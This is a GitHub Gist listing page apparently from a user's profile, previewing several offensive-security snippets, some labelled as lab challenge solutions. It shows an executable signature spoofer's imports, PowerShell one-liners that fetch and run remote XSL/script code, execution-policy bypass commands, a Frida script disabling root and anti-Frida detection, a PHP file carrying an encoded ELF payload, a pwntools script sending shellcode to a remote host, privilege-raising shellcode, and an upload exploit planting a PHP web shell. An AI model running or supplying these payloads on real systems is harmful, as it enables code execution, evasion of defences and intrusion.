Skip to content

Instantly share code, notes, and snippets.

@sharpicx
sharpicx / signing.py
Created August 4, 2024 09:27
.exe Malware Signer Spoofer
import random
import sys
from OpenSSL import crypto
from pathlib import Path
from ssl import get_server_certificate
from subprocess import call, PIPE
from os import system
from random import randrange, randint, uniform, shuffle, SystemRandom
from string import ascii_letters
@sharpicx
sharpicx / PowerShell.txt
Created July 14, 2024 18:37 — forked from S3cur3Th1sSh1t/PowerShell.txt
Snippets of PowerShell bypass/evasion/execution techniques that are interesting
##############################################################################
### Powershell Xml/Xsl Assembly "Fetch & Execute"
### [https://twitter.com/bohops/status/966172175555284992]
$s=New-Object System.Xml.Xsl.XsltSettings;$r=New-Object System.Xml.XmlUrlResolver;$s.EnableScript=1;$x=New-Object System.Xml.Xsl.XslCompiledTransform;$x.Load('https://gist.githubusercontent.com/bohops/ee9e2d7bdd606c264a0c6599b0146599/raw/f8245f99992eff00eb5f0d5738dfbf0937daf5e4/xsl-notepad.xsl',$s,$r);$x.Transform('https://gist.githubusercontent.com/bohops/ee9e2d7bdd606c264a0c6599b0146599/raw/f8245f99992eff00eb5f0d5738dfbf0937daf5e4/xsl-notepad.xml','z');del z;
##############################################################################
### Powershell VBScript Assembly SCT "Fetch & Execute"
### [https://twitter.com/bohops/status/965670898379476993]
@sharpicx
sharpicx / PowershellBypass.ps1
Created July 14, 2024 18:13 — forked from adithyan-ak/PowershellBypass.ps1
Bypass the PowerShell Execution Policy Restrictions
https://www.netspi.com/blog/technical/network-penetration-testing/15-ways-to-bypass-the-powershell-execution-policy/
powershell.exe -ExecutionPolicy Bypass
PowerShell.exe -ExecutionPolicy Bypass -File .runme.ps1
PowerShell.exe -ExecutionPolicy UnRestricted -File .runme.ps1
PowerShell.exe -ExecutionPolicy Remote-signed -File .runme.ps1
Echo Write-Host "My voice is my passport, verify me." | PowerShell.exe -noprofile -
powershell.exe -Enc VwByAGkAdABlAC0ASABvAHMAdAAgACcATQB5ACAAdgBvAGkAYwBlACAAaQBzACAAbQB5ACAAcABhAHMAcwBwAG8AcgB0ACwAIAB2AGUAcgBpAGYAeQAgAG0AZQAuACcA
Set-ExecutionPolicy Bypass -Scope Process
@sharpicx
sharpicx / script.js
Created July 6, 2024 12:47
challenge android
Java.perform(() => {
let RootDetector = Java.use("***.*****.**********.RootDetector");
RootDetector["isRooted"].implementation = function () {
return false; // only for boolean function calling
};
let EmulatorDetector = Java.use("***.*****.*********.EmulatorDetector");
EmulatorDetector["isEmulator"].implementation = function () {
return false; // only for boolean function calling
};
let AntiFrida = Java.use("***.*****.*********.AntiFrida");
@sharpicx
sharpicx / peler.php
Last active June 3, 2024 10:51
HTR: Slump
<?php
$hook = 'f0VMRgIBAQAAAAAAAAAAAAMAPgABAAAA4AcAAAAAAABAAAAAAAAAAIARAAAAAAAAAAAAAEAAOAAHAEAAGwAaAAEAAAAFAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAbAoAAAAAAABsCgAAAAAAAAAAIAAAAAAAAQAAAAYAAAD4DQAAAAAAAPgNIAAAAAAA+A0gAAAAAABwAgAAAAAAAHgCAAAAAAAAAAAgAAAAAAACAAAABgAAABgOAAAAAAAAGA4gAAAAAAAYDiAAAAAAAMABAAAAAAAAwAEAAAAAAAAIAAAAAAAAAAQAAAAEAAAAyAEAAAAAAADIAQAAAAAAAMgBAAAAAAAAJAAAAAAAAAAkAAAAAAAAAAQAAAAAAAAAUOV0ZAQAAAB4CQAAAAAAAHgJAAAAAAAAeAkAAAAAAAA0AAAAAAAAADQAAAAAAAAABAAAAAAAAABR5XRkBgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQAAAAAAAAAFLldGQEAAAA+A0AAAAAAAD4DSAAAAAAAPgNIAAAAAAACAIAAAAAAAAIAgAAAAAAAAEAAAAAAAAABAAAABQAAAADAAAAR05VAGhkFopFVPvXbYbBilBq7Sd8S1krAAAAAAMAAAANAAAAAQAAAAYAAACIwCBFAoRgGQ0AAAARAAAAEwAAAEJF1exgXb1c3muVgLvjknzYcVgcuY3xDurT7w4bn4gLAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHkAAAASAAAAAAAAAAAAAAAAAAAAAAAAABwAAAAgAAAAAAAAAAAAAAAAAAAAAAAAAIYAAAASAAAAAAAAAAAAAAAAAAAAAAAAAJcAAAASAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAAgAAAAAAAAAAAAAAAAAAAAAAAAAIAAAAASAAAAAAAAAAAAAAAAAAAAAAAAAGEAAAAgAAAAAAAAAAAAAAAAAAAAA
@sharpicx
sharpicx / a.py
Created June 2, 2024 03:30
HTR: Demo-Socket
from pwn import *
context(arch="i386", os="linux", log_level="debug")
r = remote("192.168.1.100", 12321)
bin_sh = b""
bin_sh += b"\xb8\x07\x5c\xd7\x1a\xd9\xc5\xd9\x74\x24\xf4"
bin_sh += b"\x5e\x2b\xc9\xb1\x12\x31\x46\x12\x83\xc6\x04"
bin_sh += b"\x03\x41\x52\x35\xef\x7c\xb1\x4e\xf3\x2d\x06"
bin_sh += b"\xe2\x9e\xd3\x01\xe5\xef\xb5\xdc\x66\x9c\x60"
@sharpicx
sharpicx / a.js
Created June 2, 2024 03:29
HMV: Wild
const axios = require("axios");
const readline = require("readline");
const cheerio = require("cheerio");
const colors = {
reset: "\x1b[0m",
bright: "\x1b[1m",
dim: "\x1b[2m",
underscore: "\x1b[4m",
blink: "\x1b[5m",
@sharpicx
sharpicx / a.asm
Created June 2, 2024 03:28
HTR: Magnum
section .text
global main
main:
xor eax, eax
xor ebx, ebx
xor ecx, ecx
xor edx, edx
mov al, 0xd0
int 0x80 ; setresuid(0, 0, 0)
@sharpicx
sharpicx / a.py
Last active June 3, 2024 04:30
HTR: Woof
import requests
import random
import string
def upload_txt_file(file_name):
file_data = "<?=`$_POST[0]`?>"
upload_uri = "http://xxxxxxxxxx/xxx/xx/xxxxxxxxx.x/xxx/xxxxxxxxx.xxxxxxx.php"
files = {"upload[]": (file_name, file_data, "application/x-httpd-php")}
data = {"cmd": "upload", "target": "l1_Lw"}
response = requests.post(upload_uri, files=files, data=data)
@sharpicx
sharpicx / test.py
Created May 10, 2024 13:10
grab all tweets
from twikit import Client
import json
import pandas as pd
import itertools
USERNAME = 'username here'
EMAIL = 'email here'
PASSWORD = 'password here'
client = Client('en-US')